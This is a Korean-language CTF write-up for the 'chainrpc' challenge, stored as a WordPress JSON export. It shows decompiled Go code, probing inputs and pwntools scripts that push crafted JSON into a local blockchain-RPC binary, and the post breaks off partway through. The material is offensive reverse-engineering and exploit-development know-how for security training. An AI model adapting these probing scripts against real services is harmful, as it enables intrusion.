{"id":3375,"date":"2025-04-21T16:17:42","date_gmt":"2025-04-21T07:17:42","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3375"},"modified":"2025-04-21T16:28:52","modified_gmt":"2025-04-21T07:28:52","slug":"%ed%95%b5%ed%85%8c%ec%98%a8-2024-chainrpc","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3375","title":{"rendered":"[\ud575\ud14c\uc628 2024] chainrpc"},"content":{"rendered":"\n

checksec<\/h3>\n\n\n\n
ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ checksec .\/chainrpc\n[*] '\/home\/ubuntu\/hto2024\/chainrpc\/chainrpc'\n    Arch:       amd64-64-little\n    RELRO:      No RELRO\n    Stack:      No canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)<\/pre>\n\n\n\n
Analysis<\/h3>\n\n\n\n
\uc2e4\ud589\ud558\uace0, \uadf8\ub0e5 \uc5d4\ud130\uce58\ub2c8\uae4c JSON \ub0b4\uc6a9\uc744 \uc785\ub825\ud574\uc918\uc57c\ud558\ub294\ub4ef.<\/p>\n\n\n\n
ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n\nFailed to parse input as JSON: unexpected end of JSON input\nFailed to run command: unexpected end of JSON input\n\nFailed to parse input as JSON: unexpected end of JSON input\nFailed to run command: unexpected end of JSON input<\/pre>\n\n\n\n
{}<\/code> \uc785\ub825 \uacb0\uacfc \u2192 args is nil<\/code> \uc5d0\ub7ec.<\/p>\n\n\n\n
ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{}\nFailed to execute command: args is nil\nFailed to run command: args is nil<\/pre>\n\n\n\n
chainrpc_pkg_command_ExecuteCommand<\/code> \ud568\uc218\uc5d0\uc11c \uac80\uc0ac\ud568.<\/p>\n\n\n\n
__int64 __golang chainrpc_pkg_command_ExecuteCommand(\n        __int64 a1,\n        __int64 a2,\n        __int64 a3,\n        __int64 a4,\n        int a5,\n        int a6,\n        int a7,\n        int a8,\n        int a9)\n{\n...  \n  if ( !a2 )\n  {\n    fmt_Errorf((unsigned int)\"args is nil\", 11, 0, 0, 0, a6, a7, a8, a9, v85, v93, v101);\n    return 0;\n  }\n...<\/pre>\n\n\n\n
args<\/code> \uad6c\ubb38 \ucd94\uac00\ud574\uc92c\ub354\ub2c8 \uc5d0\ub7ec \uc548\ub738(\ub2e8 \uc544\ubb34 \ucd9c\ub825\uc774 \uc5c6\uc74c). \uc720\ud6a8\ud55c \uad6c\ubb38\uc778\ub4ef\uc2f6\uc74c.<\/p>\n\n\n\n
ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"args\": \"DDDD\", \"A\":\"BBBB\", \"B\": true, \"C\": 1337}<\/pre>\n\n\n\n
a2<\/code>\uc778 rbx<\/code> \uac12\uc744 \ud655\uc778\ud574\ubcf4\uba74 ,\u201dDDDD\u201d<\/code>\ub85c \ub123\uc5b4\ub1a8\ub358 0x44444444<\/code>\uac00 \ub4e4\uc5b4\uac00\uc788\uc74c. \ub530\ub77c\uc11c \uc5d0\ub7ec \uc548\ub728\ub294\ub370 \ub9de\ub2e4.<\/p>\n\n\n\n
>>> [START hook at chainrpc_pkg_command_getArgType (0x4EA0E0)]\n    RIP = 0x4ea0e0\n    args = {'rip': '0x4ea0e0', 'rax': '0x4f7140', 'rbx': '0xc000014100', 'rcx': '0xc0000140f0', 'rdi': '0x0', 'rsi': '0x18', 'r8': '0x4faf00', 'r9': '0xc0000140f0', 'r10': '0x18', 'r11': '0x98'}<\/pre>\n\n\n\n
(gdb) x\/gx 0xc000014100\n0xc000014100:\t0x000000c000012158\n(gdb) x\/gx 0x000000c000012158\n0xc000012158:\t0x0000000044444444<\/pre>\n\n\n\n
golang\uc5d0\uc11c JSON\uc744 \ud30c\uc2f1 \ud558\uae30 \uc704\ud574\uc11c\ub294 struct \uc791\uc131 \ud544\uc694.<\/p>\n\n\n\n
\u201cargs\u201d \uc2a4\ud2b8\ub9c1\uc744 \uac80\uc0c9\ud574\ubd24\ub354\ub2c8 \uc544\ub798 \ud14d\uc2a4\ud2b8\uac00 \ub208\uc5d0 \ub754.<\/p>\n\n\n\n
.rodata:00000000004F08CD 00000010 C Args\\vjson:\\”args\\\u201d<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\ud574\ub2f9 \uc8fc\uc18c\uc758 \uc778\uc811\ud574\uc788\ub294 JSON \ud0a4\uac12\ub4e4\uc744 \ubd24\uc744\ub54c, \ub2e4\uc74c 3\uac00\uc9c0 \ud0a4\ub97c \ubc1b\uc544\uc634.<\/p>\n\n\n\n
    \n
  • type<\/li>\n\n\n\n
  • args<\/li>\n\n\n\n
  • from<\/li>\n<\/ul>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    type \ud0a4 \uac12\uc774 \uc720\ud6a8\ud558\uc9c0 \uc54a\uc74c.<\/p>\n\n\n\n
    ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": \"AAAAAAAA\", \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\nFailed to parse input as JSON: json: cannot unmarshal string into Go struct field CommandWithArgs.type of type command.CommandType\nFailed to run command: json: cannot unmarshal string into Go struct field CommandWithArgs.type of type command.CommandType\n^C\n\n\nubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\n(NO OUTPUT)<\/pre>\n\n\n\n
    type \ud0a4\uac12 \ud0c0\uc785\uc740 \uc815\uc218\ud615<\/strong>\uc774\uc5ec\uc57c \ud568.<\/p>\n\n\n\n
    ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": \"AAAAAAAA\", \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\nFailed to parse input as JSON: json: cannot unmarshal string into Go struct field CommandWithArgs.type of type command.CommandType\nFailed to run command: json: cannot unmarshal string into Go struct field CommandWithArgs.type of type command.CommandType\n^C\n\nubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": true, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\nFailed to parse input as JSON: json: cannot unmarshal bool into Go struct field CommandWithArgs.type of type command.CommandType\nFailed to run command: json: cannot unmarshal bool into Go struct field CommandWithArgs.type of type command.CommandType\n^C\n\nubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": 1337, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\n(NO OUTPUT)<\/pre>\n\n\n\n
    type\uc774 1337\uc77c\ub54c, chainrpc_pkg_command_ExecuteCommand<\/code> \ud568\uc218 \ud638\ucd9c\uc2dc rax \ub808\uc9c0\uc2a4\ud130\ub85c \ub4e4\uc5b4\uac10<\/p>\n\n\n\n
    {\"type\": 1337, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\n>>> [START hook at chainrpc_pkg_command_ExecuteCommand (0x4EA200)]\n    RIP = 0x4ea200\n    args = {'rip': '0x4ea200', 'rax': '0x539', 'rbx': '0xc0001860a0', 'rcx': '0xa', 'rdi': '0x10', 'rsi': '0x0', 'r8': '0x0', 'r9': '0x0', 'r10': '0xc000184028', 'r11': '0x0'}<\/pre>\n\n\n\n
    type\uc774 1\uc77c \uacbd\uc6b0.<\/h3>\n\n\n\n
    {\"type\": 1, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}<\/code><\/p>\n\n\n\n
    \uc0c8 \uacc4\uc815 \uc0dd\uc131.<\/p>\n\n\n\n
    \/\/ chainrpc\/pkg\/command.NewAccount\n__int64 __golang chainrpc_pkg_command_NewAccount(\n        __int64 a1,\n        int a2,\n        __int64 a3,\n        __int64 a4,\n        __int64 a5,\n        int a6,\n        int a7,\n        int a8,\n        int a9)\n{\n  __int64 v9; \/\/ rax\n  int v10; \/\/ eax\n  int v11; \/\/ r8d\n  int v12; \/\/ r9d\n  int v13; \/\/ r10d\n  int v14; \/\/ r11d\n\n  v9 = chainrpc_pkg_account_NewAccount(a1, a2, a3, a4, a5, a6, a7, a8, a9);\n  if ( v9 )\n    v9 = *(_QWORD *)(v9 + 8);\n  v10 = encoding_json_Marshal(v9, a2);\n  if ( a4 )\n    return (*(__int64 (__golang **)(__int64))(a4 + 24))(a5);\n  else\n    return runtime_slicebytetostring(0, v10, a2, 0, a5, v11, v12, v13, v14);\n}<\/pre>\n\n\n\n
    ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": 1, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\n{\"privateKey\":\"Rr8LOacVtLwQV1yyOgIS8qAWTNtdZMsXiXZEveluWwNvuWF+slvRyTgbpbWpJhdu5vwlTZhb6qi33IF6Cibbww==\",\"publicKey\":\"b7lhfrJb0ck4G6W1qSYXbub8JU2YW+qot9yBegom28M=\",\"balance\":0}<\/pre>\n\n\n\n
    type\uc774 2\uc77c \uacbd\uc6b0.<\/h3>\n\n\n\n
    not implemented<\/code> \ud328\ub2c9 \ubc1c\uc0dd<\/p>\n\n\n\n
    \/\/ chainrpc\/pkg\/command.ExecuteCommand\n__int64 __golang chainrpc_pkg_command_ExecuteCommand(\n        __int64 type,\n        __int64 (__golang *a2)(__int64, __int64),\n        __int64 a3,\n        __int64 a4,\n        int a5,\n        int a6,\n        int a7,\n        int a8,\n        int a9)\n{\n...\n    if ( _type == 2 )\n      runtime_gopanic(\n        (unsigned int)qword_4F7140,\n        (unsigned int)&off_543F40,\n        2,\n        (unsigned int)\"\\b\",\n        v11,\n        v22,\n        v23,\n        v24,\n        v25);\n...<\/pre>\n\n\n\n
    ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": 2, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\npanic: not implemented\n\ngoroutine 1 [running]:\nchainrpc\/pkg\/command.ExecuteCommand({0xc000112000?, {0xc000012170?, 0x400?, 0x34?}})\n\tchainrpc\/pkg\/command\/command.go:102 +0x4c5\nchainrpc\/pkg\/command.Run({0xc000112000?, 0x20?})\n\tchainrpc\/pkg\/command\/command.go:249 +0xa5\nmain.main()\n\t.\/main.go:26 +0x276<\/pre>\n\n\n\n
    type\uc774 3\uc77c \uacbd\uc6b0.<\/h3>\n\n\n\n
    {\"type\": 3, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}<\/code><\/p>\n\n\n\n
    {\"type\": 3, \"args\": \"flag\", \"from\": \"CCCCCCCC\"}<\/code><\/p>\n\n\n\n
    \ud30c\uc77c\uc744 \ubd88\ub7ec\uc624\ub294\ub4ef \uc2f6\uc73c\ub098, \ub0b4\uc6a9\uc744 \ucd9c\ub825\ud574\uc8fc\uc9c4 \uc54a\uc74c.<\/p>\n\n\n\n
    ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": 3, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\nLoading blockchain from file\nopen BBBBBBBB: no such file or directory\n^C\n\nubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": 3, \"args\": \"flag\", \"from\": \"CCCCCCCC\"}\nLoading blockchain from file\ninvalid character 'l' in literal false (expecting 'a')<\/pre>\n\n\n\n
    \/\/ chainrpc\/pkg\/command.LoadChainFromFile\n__int64 __golang chainrpc_pkg_command_LoadChainFromFile(\n        int a1,\n        __int64 a2,\n        int a3,\n        __int64 a4,\n        __int64 a5,\n        int a6,\n        int a7,\n        int a8,\n        int a9)\n{\n  __int64 ChainFromFile; \/\/ rax\n  __int64 v10; \/\/ rcx\n  int v11; \/\/ ebx\n  int v12; \/\/ eax\n  int v13; \/\/ ecx\n  int v14; \/\/ r8d\n  int v15; \/\/ r9d\n  int v16; \/\/ r10d\n  int v17; \/\/ r11d\n  _QWORD *v18; \/\/ rax\n  int v19; \/\/ r8d\n  int v20; \/\/ r9d\n  int v21; \/\/ r10d\n  __int64 *v22; \/\/ r11\n  __int64 v23; \/\/ rdx\n  int v25; \/\/ [rsp+8h] [rbp-18h]\n  __int64 v26; \/\/ [rsp+10h] [rbp-10h]\n\n  ChainFromFile = chainrpc_pkg_chain_LoadChainFromFile(a1, a2, a3, a4, a5, a6, a7, a8, a9);\n  if ( a2 )\n    return (*(__int64 (__golang **)(__int64))(a2 + 24))(v10);\n  v26 = ChainFromFile;\n  v11 = ChainFromFile;\n  v12 = encoding_json_Marshal((int)\"\\b\", ChainFromFile);\n  if ( a4 )\n    return (*(__int64 (__golang **)(__int64))(a4 + 24))(a5);\n  v25 = v12;\n  v18 = (_QWORD *)runtime_newobject(qword_504F20, v11, v13, 0, a5, v14, v15, v16, v17);\n  *v18 = &off_545610;\n  if ( dword_653FE0 )\n  {\n    v18 = (_QWORD *)runtime_gcWriteBarrier1(v18);\n    v23 = v26;\n    *v22 = v26;\n  }\n  else\n  {\n    v23 = v26;\n  }\n  v18[1] = v23;\n  if ( dword_653FE0 )\n  {\n    v18 = (_QWORD *)runtime_gcWriteBarrier2(v18);\n    *v22 = (__int64)v18;\n    v22[1] = qword_5F34F8;\n  }\n  qword_5F34F8 = (__int64)v18;\n  return runtime_slicebytetostring(0, v25, v11, 0, a5, v19, v20, v21, (_DWORD)v22);\n}<\/pre>\n\n\n\n
    type\uc774 4\uc77c \uacbd\uc6b0.<\/h3>\n\n\n\n
    {\"type\": 4, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}<\/code><\/p>\n\n\n\n
    ArgType\uc774 3\uc774\uc5ec\uc57c \ud568.<\/p>\n\n\n\n
    __int64 __golang chainrpc_pkg_command_ExecuteCommand(\n...\nArgType = chainrpc_pkg_command_getArgType(*v109, v20, (__int64)v109, (__int64)\"\\b\", v11, v16, v17, v18, v19);\n...\nif ( ArgType != 3 )\n    {\nLABEL_35:\n      fmt_Errorf((unsigned int)\"invalid arg type\", 16, 0, 0, 0, v22, v23, v24, v25, v85, v88, v91);\n      return 0;\n    }<\/pre>\n\n\n\n
    ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": 4, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\nFailed to execute command: invalid arg type\nFailed to run command: invalid arg type<\/pre>\n\n\n\n
    chainrpc_pkg_command_getArgType<\/code>\uc740 \ub9ac\ud134\uac12\uc740 \ub2e4\uc74c\uacfc \uac19\uc74c.<\/p>\n\n\n\n
      \n
    • number type \u2192 return 0;<\/li>\n\n\n\n
    • string type \u2192 return 1;<\/li>\n\n\n\n
    • boolean type \u2192 return 0;<\/li>\n\n\n\n
    • {} object type \u2192 return 3;<\/li>\n\n\n\n
    • [] array type \u2192 return 4;<\/li>\n\n\n\n
    • null \u2192 return 5;<\/li>\n<\/ul>\n\n\n\n
      \uc989 type \ud0a4 \uac12 \ud0c0\uc785\uc740 {} object \uc5ec\uc57c\ud568.<\/p>\n\n\n\n
      ArgType\uc774 3 \ucda9\uc871\uc2dc, chainrpc_pkg_command_LoadChainFromJSON<\/code> \ud638\ucd9c.<\/p>\n\n\n\n
      if ( ArgType == 3 )\n      {\n        v37 = (int)v104;\n        v38 = runtime_slicebytetostring(\n                (unsigned int)&v100,\n                (_DWORD)v104,\n                v102,\n                (unsigned int)\"\\b\",\n                v11,\n                v22,\n                v23,\n                v24,\n                v25);\n        return chainrpc_pkg_command_LoadChainFromJSON(v38, v37, v39, (unsigned int)\"\\b\", v11, v40, v41, v42, v43);\n      }<\/pre>\n\n\n\n
      \ud568\uc218 \uc774\ub984\uc744 \uc720\ucd94\ud574\ubd24\uc744\ub54c, args<\/code> \ud0a4\uac12\uc5d0 blockchain.json \ub0b4\uc6a9\uc744 \ub123\uc73c\uba74?<\/p>\n\n\n\n
      from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\nimport json\n\np = process(\".\/chainrpc\")\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims, drop=True: p.recvuntil(delims, drop)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\nwith open('blockchain.json', 'r', encoding='utf-8') as f:\n    blockchain_data = json.load(f)\n\nwith open('account.json', 'r', encoding='utf-8') as f:\n    account_data = json.load(f)\n\npayload = {\n    \"type\": 4,\n    \"args\": blockchain_data,\n    \"from\": \"CCCCCCCC\"\n}\n\n\n#stage 1\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\np.interactive()<\/pre>\n\n\n\n
      \ubc29\uae08 \ubcf4\ub0b8 blockchain \ub0b4\uc6a9\uc774 \ubc18\ud658\ub428.<\/p>\n\n\n\n
      {\"blocks\":[{\"index\":0,\"timestamp\":\"2024-03-08T04:57:24+09:00\",\"transactions\":[{\"From\":\"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\",\"To\":\"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\",\"Amount\":10000,\"Fee\":0,\"Timestamp\":\"2024-03-08T04:57:24+09:00\",\"Message\":\"\",\"Signature\":\"0qf7IJJ2VZS6oa9FnTodiizamX5StE67TrbU2UCBNrmnFv1wK1ibYENIwh\/7Bz0u1Q8v5Gmx4QE8alX+wwRvAg==\"},{\"From\":\"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\",\"To\":\"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\",\"Amount\":50,\"Fee\":0,\"Timestamp\":\"2024-03-08T04:57:24+09:00\",\"Message\":\"\",\"Signature\":\"qf8BRobRtmn75XmwCy0hiF5ODys7c4PY9B3fV\/gcbaV7rRLTHfzRt0BitwH\/a2i\/S7E3z2uUXQxKmM1H1P9sCQ==\"}],\"hash\":\"1a05060d\",\"prevHash\":\"\"}],\"transactionPool\":[]}<\/pre>\n\n\n\n
      type\uc774 5\uc77c \uacbd\uc6b0.<\/h3>\n\n\n\n
      ArgType = 3 \ucda9\uc871 \ud544\uc694 \u2192 \u201cargs\u201d \ud0a4\uac12 \ud0c0\uc785\uc774 {} object\uc5ec\uc57c\ud568.
      \ucda9\uc871\uc2dc chainrpc_pkg_command_LoadAccount<\/code> \ud638\ucd9c.<\/p>\n\n\n\n
      ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": 5, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\nFailed to execute command: invalid arg type\nFailed to run command: invalid arg type<\/pre>\n\n\n\n
      if ( ArgType != 3 )\n    {\nLABEL_35:\n      fmt_Errorf((unsigned int)\"invalid arg type\", 16, 0, 0, 0, v22, v23, v24, v25, v85, v88, v91);\n      return 0;\n    }\n    result = chainrpc_pkg_command_LoadAccount(_type, (__int64)v104, v102, v103, v11, v22, v23, v24, v25);<\/pre>\n\n\n\n
      \ud568\uc218 \uc774\ub984\uc744 \uc720\ucd94\ud574\ubd24\uc744\ub54c, args<\/code> \ud0a4\uac12\uc5d0 account.json \ub0b4\uc6a9\uc744 \ub123\uc73c\uba74?<\/p>\n\n\n\n
      from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\nimport json\n\np = process(\".\/chainrpc\")\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims, drop=True: p.recvuntil(delims, drop)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\nwith open('blockchain.json', 'r', encoding='utf-8') as f:\n    blockchain_data = json.load(f)\n\nwith open('account.json', 'r', encoding='utf-8') as f:\n    account_data = json.load(f)\n\npayload = {\n    \"type\": 5,\n    \"args\": account_data,\n    \"from\": \"CCCC\"\n}\n\n\n#stage 2\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\np.interactive()<\/pre>\n\n\n\n
      blockchain not initialized<\/code> \uc5d0\ub7ec \ubc1c\uc0dd.<\/p>\n\n\n\n
      ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ python3 solve_test2.py\n[+] Starting local process '.\/chainrpc': pid 6433\n[+] payload: {\"type\": 5, \"args\": {\"privateKey\": \"ytfr62yr84P8P7REsr8CGBFVNgShHXX9DLOD4j9rb9Uims4qsa1gFZvgjCSTtzLejcsC8y9uLzvu5IfVYY1NYg==\", \"publicKey\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"balance\": 50}, \"from\": \"asdf\"}\n[*] Switching to interactive mode\nFailed to get blockchain: blockchain not initialized\nFailed to execute command: invalid account\nFailed to run command: invalid account<\/pre>\n\n\n\n
      \uadf8\ub7ec\uba74 type 3\uc778 chainrpc_pkg_command_LoadChainFromJSON<\/code> \ud638\ucd9c\uc744 \uba3c\uc800\ud558\uace0, \ub2e4\uc2dc\ud574\ubcf4\uc790.<\/p>\n\n\n\n
      from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\nimport json\n\n# p = remote(\"127.0.0.1\", 1337)\np = process(\".\/chainrpc\")\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims, drop=True: p.recvuntil(delims, drop)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\nwith open('blockchain.json', 'r', encoding='utf-8') as f:\n    blockchain_data = json.load(f)\n\nwith open('account.json', 'r', encoding='utf-8') as f:\n    account_data = json.load(f)\n\npayload = {\n    \"type\": 4,\n    \"args\": blockchain_data,\n    \"from\": \"CCCC\"\n}\n\n\n#stage 1\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\n\n#stage 2\npayload = json.loads(payload)\npayload[\"type\"] = 5\npayload[\"args\"].update(account_data)\n\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\np.interactive()<\/pre>\n\n\n\n
      \uc131\uacf5\uc801\uc73c\ub85c \uc218\ud589\ud55c\ub4ef \uc2f6\ub2e4. \uc544\ub798 \uba54\uc2dc\uc9c0\uac00 \ub098\ud0c0\ub09c\ub2e4. 
      Checking transaction<\/code>
      Valid account. Restore Complete<\/code><\/p>\n\n\n\n
      ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ python3 solve_test2_1.py \n[+] Starting local process '.\/chainrpc': pid 6455\n[+] payload: {\"type\": 4, \"args\": {\"blocks\": [{\"index\": 0, \"timestamp\": \"2024-03-08T04:57:24+09:00\", \"transactions\": [{\"From\": \"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\", \"To\": \"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\", \"Amount\": 10000, \"Fee\": 0, \"Timestamp\": \"2024-03-08T04:57:24+09:00\", \"Message\": \"\", \"Signature\": \"0qf7IJJ2VZS6oa9FnTodiizamX5StE67TrbU2UCBNrmnFv1wK1ibYENIwh\/7Bz0u1Q8v5Gmx4QE8alX+wwRvAg==\"}, {\"From\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"To\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"Amount\": 50, \"Fee\": 0, \"Timestamp\": \"2024-03-08T04:57:24+09:00\", \"Message\": \"\", \"Signature\": \"qf8BRobRtmn75XmwCy0hiF5ODys7c4PY9B3fV\/gcbaV7rRLTHfzRt0BitwH\/a2i\/S7E3z2uUXQxKmM1H1P9sCQ==\"}], \"hash\": \"1a05060d\", \"prevHash\": \"\"}], \"transactionPool\": []}, \"from\": \"CCCC\"}\n[+] payload: {\"type\": 5, \"args\": {\"blocks\": [{\"index\": 0, \"timestamp\": \"2024-03-08T04:57:24+09:00\", \"transactions\": [{\"From\": \"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\", \"To\": \"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\", \"Amount\": 10000, \"Fee\": 0, \"Timestamp\": \"2024-03-08T04:57:24+09:00\", \"Message\": \"\", \"Signature\": \"0qf7IJJ2VZS6oa9FnTodiizamX5StE67TrbU2UCBNrmnFv1wK1ibYENIwh\/7Bz0u1Q8v5Gmx4QE8alX+wwRvAg==\"}, {\"From\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"To\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"Amount\": 50, \"Fee\": 0, \"Timestamp\": \"2024-03-08T04:57:24+09:00\", \"Message\": \"\", \"Signature\": \"qf8BRobRtmn75XmwCy0hiF5ODys7c4PY9B3fV\/gcbaV7rRLTHfzRt0BitwH\/a2i\/S7E3z2uUXQxKmM1H1P9sCQ==\"}], \"hash\": \"1a05060d\", \"prevHash\": \"\"}], \"transactionPool\": [], \"privateKey\": \"ytfr62yr84P8P7REsr8CGBFVNgShHXX9DLOD4j9rb9Uims4qsa1gFZvgjCSTtzLejcsC8y9uLzvu5IfVYY1NYg==\", \"publicKey\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"balance\": 50}, \"from\": \"CCCC\"}\n[*] Switching to interactive mode\n{\"blocks\":[{\"index\":0,\"timestamp\":\"2024-03-08T04:57:24+09:00\",\"transactions\":[{\"From\":\"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\",\"To\":\"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\",\"Amount\":10000,\"Fee\":0,\"Timestamp\":\"2024-03-08T04:57:24+09:00\",\"Message\":\"\",\"Signature\":\"0qf7IJJ2VZS6oa9FnTodiizamX5StE67TrbU2UCBNrmnFv1wK1ibYENIwh\/7Bz0u1Q8v5Gmx4QE8alX+wwRvAg==\"},{\"From\":\"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\",\"To\":\"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\",\"Amount\":50,\"Fee\":0,\"Timestamp\":\"2024-03-08T04:57:24+09:00\",\"Message\":\"\",\"Signature\":\"qf8BRobRtmn75XmwCy0hiF5ODys7c4PY9B3fV\/gcbaV7rRLTHfzRt0BitwH\/a2i\/S7E3z2uUXQxKmM1H1P9sCQ==\"}],\"hash\":\"1a05060d\",\"prevHash\":\"\"}],\"transactionPool\":[]}\nChecking transaction\nValid account. Restore Complete\n{\"privateKey\":\"ytfr62yr84P8P7REsr8CGBFVNgShHXX9DLOD4j9rb9Uims4qsa1gFZvgjCSTtzLejcsC8y9uLzvu5IfVYY1NYg==\",\"publicKey\":\"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\",\"balance\":50}<\/pre>\n\n\n\n
      type\uc774 6\uc77c \uacbd\uc6b0.<\/h3>\n\n\n\n
      ArgType = 3 \ucda9\uc871 \ud544\uc694 \u2192 \u201cargs\u201d \ud0a4\uac12 \ud0c0\uc785\uc774 {} object\uc5ec\uc57c\ud568.
      \ucda9\uc871\uc2dc chainrpc_pkg_command_SendTransaction<\/code> \ud638\ucd9c.<\/p>\n\n\n\n
      ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": 6, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\nFailed to execute command: invalid arg type\nFailed to run command: invalid arg type<\/pre>\n\n\n\n
          if ( _type == 6 )\n    {\n      if ( ArgType != 3 )\n        goto LABEL_35;\n      v106 = (__int64 (__golang *)(__int64, __int64))runtime_newobject(\"(\", v20, 6, (int)\"\\b\", v11, v22, v23, v24, v25);\n      if ( encoding_json_Unmarshal(v104, v102, v103, (__int64)\"\\b\", v106, v45, v46, v47, v48) )\n        return 0;\n      else\n        return chainrpc_pkg_command_SendTransaction(\n                 *(_QWORD *)v106,\n                 *((_QWORD *)v106 + 1),\n                 *((_QWORD *)v106 + 2),\n                 *((_QWORD *)v106 + 3),\n                 *((_QWORD *)v106 + 4),\n                 v49,\n                 v50,\n                 v51,\n                 v52,\n                 v85,\n                 v88,\n                 v91);<\/pre>\n\n\n\n
      type3\uc778 chainrpc_pkg_command_LoadChainFromJSON<\/code>,
      type4\uc778 chainrpc_pkg_command_LoadAccount<\/code>,
